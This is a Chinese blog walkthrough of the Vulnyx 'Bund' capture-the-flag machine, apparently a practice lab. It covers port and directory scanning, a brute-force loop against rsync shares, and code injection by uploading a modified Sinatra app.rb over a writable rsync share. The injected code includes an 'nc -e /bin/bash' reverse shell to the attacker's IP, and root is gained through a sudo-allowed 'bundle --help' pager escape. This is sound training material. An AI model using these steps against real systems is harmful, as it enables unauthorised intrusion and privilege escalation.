Pepster'Blog
Vulnyx-Bund-Walkthrough
城南花已开 Lv6
  2025-03-04 16:46:08   2025-04-18 23:34:08    1.7k 字  9 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.226  08:00:27:03:c1:c7       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.039 seconds (125.55 hosts/sec). 4 responded
export ip=192.168.60.226
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.226:22
Open 192.168.60.226:80
Open 192.168.60.226:873
Open 192.168.60.226:9393
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 16:47 CST
Initiating ARP Ping Scan at 16:47
Scanning 192.168.60.226 [1 port]
Completed ARP Ping Scan at 16:47, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:47
Completed Parallel DNS resolution of 1 host. at 16:47, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:47
Scanning 192.168.60.226 [4 ports]
Discovered open port 22/tcp on 192.168.60.226
Discovered open port 9393/tcp on 192.168.60.226
Discovered open port 873/tcp on 192.168.60.226
Discovered open port 80/tcp on 192.168.60.226
Completed SYN Stealth Scan at 16:47, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.60.226
Host is up, received arp-response (0.00054s latency).
Scanned at 2025-03-04 16:47:36 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
873/tcp  open  rsync   syn-ack ttl 64
9393/tcp open  unknown syn-ack ttl 64
MAC Address: 08:00:27:03:C1:C7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

扫一下目录

基本啥信息也没有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.226
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 19]
Progress: 922428 / 1038220 (88.85%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 922428 / 1038220 (88.85%)
===============================================================
Finished
===============================================================

浏览器访问一下,内容就是网站建设中

image

访问一下9393端口

一模一样

rsync端口下模糊测试一下

具体可以参加Vulnyx-Bola-Walkthrough | Pepster’Blog

在等了很长时间后

枚举出了fileadmin文件夹存在

1
2
3
4
5
6
7
8
9
10
11
12
for i in $(cat /usr/share/seclists/Discovery/Web-Content/common.txt);do echo $i;rsync -av --list-only rsync://$ip/$i 2>&1|grep -Piv "error";done
………………省略………………
fileadmin

receiving incremental file list
drwxrwxrwx          4,096 2023/05/27 22:40:29 .
-rwxrwxrwx             14 2023/05/27 18:00:12 Gemfile
-rwxrwxrwx            370 2023/05/27 18:01:38 Gemfile.lock
-rwxrwxrwx             75 2023/05/27 22:30:25 app.rb

sent 20 bytes  received 110 bytes  86.67 bytes/sec
total size is 459  speedup is 3.53

或者参考noname大佬的python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python3
# pip install pwntools

import subprocess
import argparse
from pwn import log, context

context.log_level = 'info'

def run_rsync(target_ip, word):
    rsync_command = f'rsync -av --list-only rsync://{target_ip}/{word}'
    try:
        result = subprocess.run(rsync_command, shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        if result.stdout.strip():
            return result.stdout.strip()
        return None
    except subprocess.CalledProcessError:
        return None

def main(target_ip, wordlist_file):
    try:
        with open(wordlist_file, 'r') as file:
            words = file.read().splitlines()
        
        for word in words:
            progress = log.progress(f"Checking {word}")
            output = run_rsync(target_ip, word)
            progress.success("Done")
            if output:
                log.info(f"Listing for {word}: {output}")
                break
    
    except FileNotFoundError:
        log.failure(f"Wordlist file '{wordlist_file}' not found.")
    except Exception as e:
        log.failure(f"An error occurred: {e}")

if __name__ == "__main__":
    log.info("")
    log.info("===================================")
    log.info("         Rsync Enumeration")
    log.info("===================================")
    log.info("")
    
    parser = argparse.ArgumentParser(description='Run rsync command with wordlist.')
    parser.add_argument('-t', '--target-ip', required=True, help='Target IP address for rsync')
    parser.add_argument('-w', '--wordlist', required=True, help='Path to wordlist file')
    args = parser.parse_args()
    
    main(args.target_ip, args.wordlist)

我们将这些文件克隆到本地

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ rsync -av rsync://$ip/fileadmin ./rsync

receiving incremental file list
created directory ./rsync
./
Gemfile
Gemfile.lock
app.rb

sent 84 bytes  received 705 bytes  143.45 bytes/sec
total size is 459  speedup is 0.58
cd rsync

我发现有个文件很有趣

1
2
3
4
5
6
7
8
cat app.rb
require 'sinatra'
require 'shotgun'

get '/' do
  "Under Construction"
end

  1. require 'sinatra':
    • 这行代码引入了 Sinatra 库,它是一个用来创建 Web 应用程序的小型框架。Sinatra 使得编写 Web 应用程序变得非常简单和直观。
  2. require 'shotgun':
    • 这行代码引入了 Shotgun 库。Shotgun 是一个用于开发阶段的工具,它可以在每次请求时自动重新加载应用程序。这意味着你不需要手动重启服务器来查看代码的更改,非常适合开发和测试时使用。
  3. get '/' do ... end:
    • 这一块定义了一个路由处理器。当用户访问根路径 ('/') 时,这段代码将会被执行。
    • get '/' 表示处理 HTTP GET 请求。
    • do ... end 是一个块,当这个路由被访问时,块中的代码将会运行。
    • 这个块简单地返回一个字符串 "Under Construction"。当用户访问根路径时,他们会看到浏览器中显示这条消息。

这个ruby程序可以执行shell命令

只需要用反引号引起来即可

1
2
3
4
5
6
require 'sinatra'
require 'shotgun'

get '/' do
  `id`
  end

我修改文件尝试重新上传到fileadmin

1
2
3
4
5
6
7
8
9
❯ vi app.rb
❯ rsync -av app.rb rsync://$ip/fileadmin

sending incremental file list
app.rb

sent 170 bytes  received 41 bytes  20.10 bytes/sec
total size is 59  speedup is 0.28

结果靶机卡了端口都不开放了,没办法靶机重启一下

再次尝试curl一下

1
2
❯ curl http://192.168.60.226:9393/
uid=1000(axel) gid=1000(axel) grupos=1000(axel)

可以正常执行命令

尝试反弹一下shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ vi app.rb
require 'sinatra'
require 'shotgun'

get '/' do
  `nc -e /bin/bash 192.168.60.100 4444 `
end
❯ rsync -av app.rb rsync://$ip/fileadmin

sending incremental file list
app.rb

sent 203 bytes  received 41 bytes  162.67 bytes/sec
total size is 93  speedup is 0.38

用户提权

监听一下端口

1
2
3
4
5
6
7
8
9
10
❯ pwncat-cs -lp 4444
[17:27:46] Welcome to pwncat 🐈!                           __main__.py:164
[17:27:47] received connection from 192.168.60.226:59944        bind.py:84
[17:27:47] 0.0.0.0:4444: normalizing shell path             manager.py:957
[17:27:48] 192.168.60.226:59944: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) axel@bund:/opt/serve$
(remote) axel@bund:/opt/serve$ cd ~
(remote) axel@bund:/home/axel$ cat user.txt
2cbcb2f721f743c1a42dcd092dc571ea

Root提权

用户拥有sudo权限,可以利用help功能man page调用less来进行提权

1
2
3
4
5
6
7
8
9
10
11
12
(remote) axel@bund:/home/axel$ sudo -l
Matching Defaults entries for axel on bund:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User axel may run the following commands on bund:
    (root) NOPASSWD: /usr/local/bin/bundle
(remote) axel@bund:/home/axel$ sudo /usr/local/bin/bundle --help
root@bund:/home/axel# id
uid=0(root) gid=0(root) grupos=0(root)
root@bund:/home/axel# cat /root/root.txt
812efa110d7a6029cbf87d5b97d53691
  1. 信息收集
    1. 服务探测
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
  2. 用户提权
  3. Root提权